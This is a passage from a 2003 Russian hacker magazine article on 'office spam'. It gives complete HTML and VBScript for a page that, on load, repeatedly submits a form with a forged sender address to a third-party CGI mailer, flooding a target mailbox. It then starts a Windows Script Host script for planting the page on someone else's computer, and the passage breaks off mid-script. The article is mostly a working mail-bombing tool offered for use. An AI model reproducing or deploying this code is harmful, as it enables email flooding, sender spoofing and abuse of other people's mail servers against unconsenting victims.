| Издательский дом ООО "Гейм Лэнд" | СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #33, АВГУСТ 2003 г. |
ОФИСНЫЙ СПАМ - бомбежка из броузера
Анализирующий
Спецвыпуск Xakep, номер #033, стр. 033-050-3
<input type="text" name="femail" value="president@whitehouse.gov"><BR>
<input type="text" name="toemail" value="billgates@microsoft.com"><BR>
Тегу <FORM> следует дать уникальное имя:
<form name="formname" action="http://www.anysite.com/cgi-bin/mailsender.cgi" method="POST">
Вот что примерно получится:
<HTML>
<HEAD>
</HEAD>
<BODY>
<form name="formname" action="http://www.anysite.com/cgi-bin/mailsender.cgi" method="POST">
<input type="text" name="fname" value="President"><BR>
<input type="text" name="femail" value="president@whitehouse.gov"><BR>
<input type="text" name="toemail" value="billgates@microsoft.com"><BR>
<input type="text" name="subject" value="Hi"><BR>
<textarea rows=8 cols=34 name="body">Hi, Bill</textarea><BR>
<input type="submit" value="Отправить">
<input type="reset" value="Очистить">
<input type="hidden" name="lng" value="ru">
<input type="hidden" name="v" value="post">
</form>
</BODY>
</HTML>
Остается создать механизм массовой отправки данного письма. Он до предела прост:
<Script type="text/vbsript">
sub window_onload
'Отсылаем форму при открытии окна.
m=100
'Количество писем. Укажи, сколько надо.
'Например, 10240, если ящик на 10 Mb :)).
for x=1 to m
document.formname.submit.
'Команда отправки формы на сервер.
next
'Следующий виток цикла.
end
alert "Mesages are sent"
'При завершении цикла выводится сообщения. Можно убрать.
</Script>
Что будет в итоге:
<HTML>
<HEAD>
</HEAD>
<BODY>
<form name="formname" action="http://www.anysite.com/cgi-bin/mailsender.cgi" method="POST">
<input type="text" name="fname" value="President"><BR>
<input type="text" name="femail" value="president@whitehouse.gov"><BR>
<input type="text" name="toemail" value="billgates@microsoft.com"><BR>
<input type="text" name="subject" value="Hi"><BR>
<textarea rows=8 cols=34 name="body">Hi, Bill</textarea><BR>
<input type="submit" value="Отправить">
<input type="reset" value="Очистить">
<input type="hidden" name="lng" value="ru">
<input type="hidden" name="v" value="post">
</form>
<Script type="text/vbsript">
sub window_onload
m=100
for x=1 to m
document.formname.submit.
next
end
</Script>
</BODY>
</HTML>
Итого: грозное оружие размером в 743 байта. Кликнул по HTML-ке, и готово!
ПОДЛОЖИ СВИНЬЮ
Если испытываешь определенные (знаем мы эти "определенные" $$$ :)) затруднения с доступом в Интернет, то пиши дополнительный сценарий:
<?xml version="1.0" encoding="ISO-8859-1"?>
<job id="T1">
<script language="VBScript">
<![CDATA[
Option explicit
Dim ProgName, WshShell
ProgName="flood.html"
'В кавычках нужно указать имя HTML файла.
On Error Resume Next
'Отключаем вывод сообщения в случае ошибки.
Set WshShell=WScript.CreateObject("WScript.Shell")